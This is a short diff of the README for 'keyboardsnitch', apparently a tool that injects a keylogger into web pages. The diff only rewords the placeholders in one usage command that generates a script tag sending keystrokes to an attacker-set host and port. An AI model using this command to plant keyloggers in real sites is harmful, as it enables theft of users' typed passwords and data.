s0lst1c3/keyboardsnitch/README.md

 To generate a script tag linking to the keylogger, use the following command:

+	# substitute YOUR_IP with your ip address
+	# substitute LISTEN_PORT with the port you want keyboardsnitch to listen on
-	python keyboardsnitch.py --inject-tag --lhost <your ip address or fqdn here> --lport <the port on which to listen for data from the keylogger>
+	python keyboardsnitch.py --inject-tag --lhost YOUR_IP --lport LISTEN_PORT

 As with the __WebSockets__ script tag, the generated script tag may require additional configuration or modification.